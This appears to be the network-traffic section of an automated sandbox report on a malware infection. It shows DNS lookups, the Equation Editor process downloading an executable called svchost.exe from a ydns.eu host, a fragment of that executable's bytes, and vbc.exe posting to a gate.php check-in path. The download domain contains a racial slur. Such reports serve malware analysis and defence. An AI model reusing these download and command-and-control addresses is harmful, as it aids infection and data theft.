                Dec 21, 2020 08:33:41.640346050 CET8.8.8.8192.168.2.220xf523No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:42.118233919 CET8.8.8.8192.168.2.220xb44cNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:42.603332043 CET8.8.8.8192.168.2.220x1bf6No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:43.056792021 CET8.8.8.8192.168.2.220x3407No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:43.542844057 CET8.8.8.8192.168.2.220xd35bNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:44.025953054 CET8.8.8.8192.168.2.220xa48No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:44.500294924 CET8.8.8.8192.168.2.220xbac1No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:44.982953072 CET8.8.8.8192.168.2.220x6328No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:45.462071896 CET8.8.8.8192.168.2.220x5df6No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:45.929359913 CET8.8.8.8192.168.2.220xaa4aNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:46.440226078 CET8.8.8.8192.168.2.220xa122No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:46.882116079 CET8.8.8.8192.168.2.220xb6ffNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:47.365688086 CET8.8.8.8192.168.2.220x3dd8No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:47.838496923 CET8.8.8.8192.168.2.220xc326No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:48.329663038 CET8.8.8.8192.168.2.220xfbaaNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:48.799899101 CET8.8.8.8192.168.2.220x9447No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:49.272435904 CET8.8.8.8192.168.2.220x1f33No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:49.773880959 CET8.8.8.8192.168.2.220xc5a6No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:50.234957933 CET8.8.8.8192.168.2.220xcac4No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:50.727616072 CET8.8.8.8192.168.2.220xb096No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:51.199632883 CET8.8.8.8192.168.2.220xb47eNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:51.661459923 CET8.8.8.8192.168.2.220x5bf1No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:52.138839960 CET8.8.8.8192.168.2.220xed4eNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:52.608187914 CET8.8.8.8192.168.2.220x5d81No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:53.089116096 CET8.8.8.8192.168.2.220x4d15No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:53.545923948 CET8.8.8.8192.168.2.220xb247No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:54.028563023 CET8.8.8.8192.168.2.220xd551No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:54.495980978 CET8.8.8.8192.168.2.220xaef1No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:54.950864077 CET8.8.8.8192.168.2.220x2f5bNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:55.396764994 CET8.8.8.8192.168.2.220x8fd0No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:58.138356924 CET8.8.8.8192.168.2.220xef23No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:58.600277901 CET8.8.8.8192.168.2.220x476bNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:59.074902058 CET8.8.8.8192.168.2.220xc2e9No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:59.538171053 CET8.8.8.8192.168.2.220x7013No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:33:59.999243975 CET8.8.8.8192.168.2.220x68ecNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:00.458333969 CET8.8.8.8192.168.2.220xd32fNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:00.927617073 CET8.8.8.8192.168.2.220xf721No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:01.370101929 CET8.8.8.8192.168.2.220x9374No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:01.813256025 CET8.8.8.8192.168.2.220x8596No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:02.234920025 CET8.8.8.8192.168.2.220x3e26No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:03.016529083 CET8.8.8.8192.168.2.220x6e6dNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:03.763997078 CET8.8.8.8192.168.2.220xe7ffNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:04.226470947 CET8.8.8.8192.168.2.220x95e8No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:04.662421942 CET8.8.8.8192.168.2.220xe5b1No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:05.116772890 CET8.8.8.8192.168.2.220x9f2dNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:05.564255953 CET8.8.8.8192.168.2.220x5352No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:06.008991003 CET8.8.8.8192.168.2.220x4f0fNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:06.452527046 CET8.8.8.8192.168.2.220x7d0eNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:06.900445938 CET8.8.8.8192.168.2.220x42b0No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:07.365592957 CET8.8.8.8192.168.2.220xbedcNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:07.810790062 CET8.8.8.8192.168.2.220x8b5No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:08.260979891 CET8.8.8.8192.168.2.220x4597No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:08.709247112 CET8.8.8.8192.168.2.220x11aNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:09.166901112 CET8.8.8.8192.168.2.220x433fNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:09.613442898 CET8.8.8.8192.168.2.220x2e22No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:10.082566023 CET8.8.8.8192.168.2.220xeeaaNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:10.540024042 CET8.8.8.8192.168.2.220x9098No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:10.974487066 CET8.8.8.8192.168.2.220x1efcNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:11.435686111 CET8.8.8.8192.168.2.220x1ef9No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:11.866249084 CET8.8.8.8192.168.2.220x6af1No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:12.342263937 CET8.8.8.8192.168.2.220xcadNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:12.793176889 CET8.8.8.8192.168.2.220xe282No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:15.224958897 CET8.8.8.8192.168.2.220x4e37No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:15.657253981 CET8.8.8.8192.168.2.220xc5No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:16.098458052 CET8.8.8.8192.168.2.220x99b5No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:16.546869040 CET8.8.8.8192.168.2.220x7dc1No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:16.990459919 CET8.8.8.8192.168.2.220x11f3No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:17.481856108 CET8.8.8.8192.168.2.220x2e47No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:17.947513103 CET8.8.8.8192.168.2.220xdf58No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:18.384497881 CET8.8.8.8192.168.2.220xd0e6No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:18.848465919 CET8.8.8.8192.168.2.220x36eNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:19.295341015 CET8.8.8.8192.168.2.220xcf0No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:19.740425110 CET8.8.8.8192.168.2.220x8499No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:20.202665091 CET8.8.8.8192.168.2.220xdcb2No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:20.648192883 CET8.8.8.8192.168.2.220xfd1cNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:21.093951941 CET8.8.8.8192.168.2.220xbbf9No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:21.545727968 CET8.8.8.8192.168.2.220xf9d0No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:21.984266996 CET8.8.8.8192.168.2.220x5928No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:22.435983896 CET8.8.8.8192.168.2.220xcf51No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:22.874603033 CET8.8.8.8192.168.2.220x3c9bNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:23.310132027 CET8.8.8.8192.168.2.220xb87No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:23.765877962 CET8.8.8.8192.168.2.220x80c6No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:24.373184919 CET8.8.8.8192.168.2.220x734bNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:24.835433960 CET8.8.8.8192.168.2.220x1864No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:25.289983988 CET8.8.8.8192.168.2.220x6fa5No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:25.736001968 CET8.8.8.8192.168.2.220xb236No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:26.185072899 CET8.8.8.8192.168.2.220x694bNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:26.638876915 CET8.8.8.8192.168.2.220xb0efNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:27.087270975 CET8.8.8.8192.168.2.220xb38No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:27.544984102 CET8.8.8.8192.168.2.220xd747No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:28.019649982 CET8.8.8.8192.168.2.220x77b8No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:28.470670938 CET8.8.8.8192.168.2.220x617cNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:28.910393953 CET8.8.8.8192.168.2.220x202No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:29.363013029 CET8.8.8.8192.168.2.220x7c63No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:29.792376041 CET8.8.8.8192.168.2.220x5ee0No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:30.488459110 CET8.8.8.8192.168.2.220xa6f6No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:31.113116026 CET8.8.8.8192.168.2.220x1ba9No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:31.554856062 CET8.8.8.8192.168.2.220xe63eNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:32.024882078 CET8.8.8.8192.168.2.220x888eNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:32.765345097 CET8.8.8.8192.168.2.220x65ddNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:33.223654985 CET8.8.8.8192.168.2.220x64faNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:33.679516077 CET8.8.8.8192.168.2.220x5a90No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:34.262284994 CET8.8.8.8192.168.2.220x4033No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:34.860109091 CET8.8.8.8192.168.2.220xfe2dNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:35.622085094 CET8.8.8.8192.168.2.220x4ad4No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:36.322339058 CET8.8.8.8192.168.2.220xfcbfNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:36.769982100 CET8.8.8.8192.168.2.220xf28fNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:37.208910942 CET8.8.8.8192.168.2.220x6d7eNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:37.691914082 CET8.8.8.8192.168.2.220x2da4No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:38.143122911 CET8.8.8.8192.168.2.220xf6c3No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:38.605318069 CET8.8.8.8192.168.2.220xf948No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:39.042166948 CET8.8.8.8192.168.2.220x5ed7No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:39.484519958 CET8.8.8.8192.168.2.220x19fNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:39.949804068 CET8.8.8.8192.168.2.220x6bdcNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:40.411335945 CET8.8.8.8192.168.2.220xed92No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:40.897921085 CET8.8.8.8192.168.2.220x6d8fNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:41.351249933 CET8.8.8.8192.168.2.220x4c89No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:41.811691046 CET8.8.8.8192.168.2.220x7dc6No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:42.254544020 CET8.8.8.8192.168.2.220xc3b2No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:42.712438107 CET8.8.8.8192.168.2.220x84feNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:43.150263071 CET8.8.8.8192.168.2.220x5b58No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:43.584795952 CET8.8.8.8192.168.2.220xb6a4No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:44.036796093 CET8.8.8.8192.168.2.220x34bcNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:44.473915100 CET8.8.8.8192.168.2.220xc12dNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:44.954178095 CET8.8.8.8192.168.2.220x5ed5No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:45.429600954 CET8.8.8.8192.168.2.220x9a94No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:45.901180983 CET8.8.8.8192.168.2.220xd4e0No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:46.319533110 CET8.8.8.8192.168.2.220x14b7No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:46.761755943 CET8.8.8.8192.168.2.220x5e2cNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:47.214833975 CET8.8.8.8192.168.2.220xe624No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:49.678874969 CET8.8.8.8192.168.2.220x4e4eNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:50.124838114 CET8.8.8.8192.168.2.220xedc0No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:50.580688000 CET8.8.8.8192.168.2.220xeb9No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:51.027374983 CET8.8.8.8192.168.2.220xbbebNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:51.576589108 CET8.8.8.8192.168.2.220x5348No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:52.005129099 CET8.8.8.8192.168.2.220xfc79No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:53.261873960 CET8.8.8.8192.168.2.220x78a1No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:53.698725939 CET8.8.8.8192.168.2.220x18c2No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:54.152901888 CET8.8.8.8192.168.2.220xb8aaNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:54.628766060 CET8.8.8.8192.168.2.220x65b7No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:55.097997904 CET8.8.8.8192.168.2.220x7104No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:55.557415962 CET8.8.8.8192.168.2.220x8aa4No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:56.016134977 CET8.8.8.8192.168.2.220xd2edNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:56.456948042 CET8.8.8.8192.168.2.220xa776No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:56.921036005 CET8.8.8.8192.168.2.220x747aNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:57.370323896 CET8.8.8.8192.168.2.220x1554No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:57.836646080 CET8.8.8.8192.168.2.220x980bNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:58.287416935 CET8.8.8.8192.168.2.220xda8eNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:58.736073017 CET8.8.8.8192.168.2.220xe33fNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:59.182039022 CET8.8.8.8192.168.2.220xc079No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:34:59.643393993 CET8.8.8.8192.168.2.220x6088No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:35:00.095675945 CET8.8.8.8192.168.2.220x99bdNo error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:35:00.546318054 CET8.8.8.8192.168.2.220xf6c8No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:35:00.984199047 CET8.8.8.8192.168.2.220x49c8No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:35:01.415328979 CET8.8.8.8192.168.2.220x2265No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:35:01.873703957 CET8.8.8.8192.168.2.220xbb03No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:35:02.325675964 CET8.8.8.8192.168.2.220x59f4No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)
                Dec 21, 2020 08:35:02.766237974 CET8.8.8.8192.168.2.220xaa23No error (0)begadi.ga185.193.143.118A (IP address)IN (0x0001)

                HTTP Request Dependency Graph

                • chnesstdyqudusisabadassniggainthestfmv.ydns.eu
                • begadi.ga

                HTTP Packets

                Session IDSource IPSource PortDestination IPDestination PortProcess
                0192.168.2.2249167103.141.138.11980C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:20.406845093 CET1OUTGET /secure/svchost.exe HTTP/1.1
                Accept: */*
                Accept-Encoding: gzip, deflate
                User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                Host: chnesstdyqudusisabadassniggainthestfmv.ydns.eu
                Connection: Keep-Alive
                Dec 21, 2020 08:33:20.617223978 CET2INHTTP/1.1 200 OK
                Date: Mon, 21 Dec 2020 07:33:18 GMT
                Server: Apache/2.4.34 (Win32) OpenSSL/1.0.2o PHP/5.6.38
                Last-Modified: Mon, 21 Dec 2020 04:54:47 GMT
                ETag: "8ec00-5b6f241edd261"
                Accept-Ranges: bytes
                Content-Length: 584704
                Keep-Alive: timeout=5, max=100
                Connection: Keep-Alive
                Content-Type: application/x-msdownload
                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 f3 56 b1 8b 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 e2 08 00 00 08 00 00 00 00 00 00 1e 01 09 00 00 20 00 00 00 20 09 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 60 09 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 c8 00 09 00 53 00 00 00 00 20 09 00 a0 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 09 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 24 e1 08 00 00 20 00 00 00 e2 08 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 a0 05 00 00 00 20 09 00 00 06 00 00 00 e4 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 40 09 00 00 02 00 00 00 ea 08 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 09 00 00 00 00 00 48 00 00 00 02 00 05 00 e0 d1 06 00 e8 2e 02 00 03 00 00 00 a9 03 00 06 10 56 02 00 d0 7b 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 8f 5d ed 3a 11 eb fd b4 77 bd ed 48 ae 33 e8 90 08 9d 63 b4 61 62 66 1c e5 d7 11 c2 c4 13 13 13 98 c8 89 05 25 1d fd a8 c3 cf 13 08 9f 1f fd 3b 78 3b 78 de 20 40 c3 92 d3 ee 6f 1d 70 92 31 c5 d4 f8 cf ea 1e c7 98 d7 15 47 0b 65 b0 cf 57 d2 e4 40 2b 95 cd 06 51 78 f0 ed 22 8f 42 f4 59 d5 7c 5e bd e8 43 09 b2 95 33 26 04 19 53 b5 08 7e 96 f9 ab 83 aa b2 cb 87 91 e8 c9 2f bd 9d 13 aa 0c 9e 75 76 2f 40 8f f1 69 4d 4d cb 25 09 16 1f e8 f6 27 fc 82 93 f9 eb 09 bd 3d 31 ea 34 7a 94 11 7c c5 29 0d e8 51 5c 0e 4b 55 93 db 16 4d 07 41 7b d8 7c 05 e3 f3 3b b1 12 a4 35 31 c2 46 1b 6c 70 a9 f2 65 16 1c 6e 69 79 11 d3 80 e5 43 a0 a6 d0 11 55 31 5c 4d d4 52 69 86 cb fb 05 de 0a 28 0f dd 89 52 3f e2 88 d5 45 4e 1f 25 1b c2 f6 cf 76 7e 92 1b 6c 80 97 b1 86 95 1f b5 98 23 24 05 1e 14 29 4a 2e 42 3d f6 35 d3 71 ea a4 d0 c1 40 55 d2 47 ee fb f4 b9 10 65 2e aa 63 f1 7a 0b f3 80 fd 84 5a 75 93 19 f7 41 85 57 75 61 29 62 e7 b8 8c 31 c2 f4 e0 60 98 e5 3a 3c 5e 80 9c b2 41 5c 29 7b 97 a2 02 3b d2 d3 e8 2c 0a 06 b4 67 84 ee 32 e9 0a 2e c6 f7 8f e5 3f 70 7b 78 40 1c cb 01 44 27 9c 25 a9 82 65 60 24 78 9c ee ae a3 68 50 b2 13 97 fc 97 95 a6 17 38 4f 82 ef a6 a0 c8 56 5a 1c 15 a6 f7 a5 02 de e6 23 88 63 6b f4 70 2d c2 54 d7 d6 e5 56 60 9c 52 2d c4 74 ae 1f
                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$PELV0 @ `@S @ H.text$ `.rsrc @@.reloc@@BH.V{]:wH3cabf%;x;x @op1GeW@+Qx"BY|^C3&S~/uv/@iMM%'=14z|)Q\KUMA{|;51FlpeniyCU1\MRi(R?EN%v~l#$)J.B=5q@UGe.czZuAWua)b1`:<^A\){;,g2.?p{x@D'%e`$xhP8OVZ#ckp-TV`R-t


                Session IDSource IPSource PortDestination IPDestination PortProcess
                1192.168.2.2249168185.193.143.11880C:\Users\Public\vbc.exe
                TimestampkBytes transferredDirectionData
                Dec 21, 2020 08:33:32.340296984 CET616OUTPOST /chud/gate.php HTTP/1.0
